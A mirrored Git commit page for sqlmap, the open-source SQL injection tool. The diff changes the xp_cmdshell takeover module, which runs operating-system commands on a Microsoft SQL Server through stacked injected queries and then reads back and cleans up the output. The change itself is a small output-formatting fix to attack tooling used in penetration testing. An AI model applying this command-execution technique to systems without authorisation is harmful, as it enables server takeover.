sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-10 00:20:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

properly display the command stdout

Browse Source
This commit is contained in:
Bernardo Damele 2012-07-09 10:52:48 +01:00
parent 3ff28e58b4
commit d08a54e375
1 changed files with 7 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
lib/takeover/xp_cmdshell.py
View File

@ -103,7 +103,7 @@ class xp_cmdshell:
threadData.disableStdOut = True threadData.disableStdOut = True
logger.info("testing if xp_cmdshell extended procedure is usable") logger.info("testing if xp_cmdshell extended procedure is usable")
output = self.evalCmd("echo 1") output = self.xpCmdshellEvalCmd("echo 1")
if isNoneValue(output): if isNoneValue(output):
errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath() errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath()
@ -179,15 +179,18 @@ class xp_cmdshell:
else: else:
inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName)) inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)) or conf.direct:
if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)):
output = inject.getValue(query, resumeValue=False, blind=False) output = inject.getValue(query, resumeValue=False, blind=False)
else: else:
output = [] output = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count): if isNumPosStrValue(count):
for index in getLimitRange(count): for index in getLimitRange(count):
query = agent.limitQuery(index, query, self.tblField) query = agent.limitQuery(index, query, self.tblField)
output.append(inject.getValue(query, inband=False, error=False, resumeValue=False)) output.append(inject.getValue(query, inband=False, error=False, resumeValue=False))
inject.goStacked("DELETE FROM %s" % self.cmdTblName) inject.goStacked("DELETE FROM %s" % self.cmdTblName)
if output and isListLike(output) and len(output) > 1: if output and isListLike(output) and len(output) > 1:
@ -196,6 +199,8 @@ class xp_cmdshell:
elif not output[-1].strip(): elif not output[-1].strip():
output = output[:-1] output = output[:-1]
output = "\n".join(line for line in output)
return output return output
def xpCmdshellInit(self): def xpCmdshellInit(self):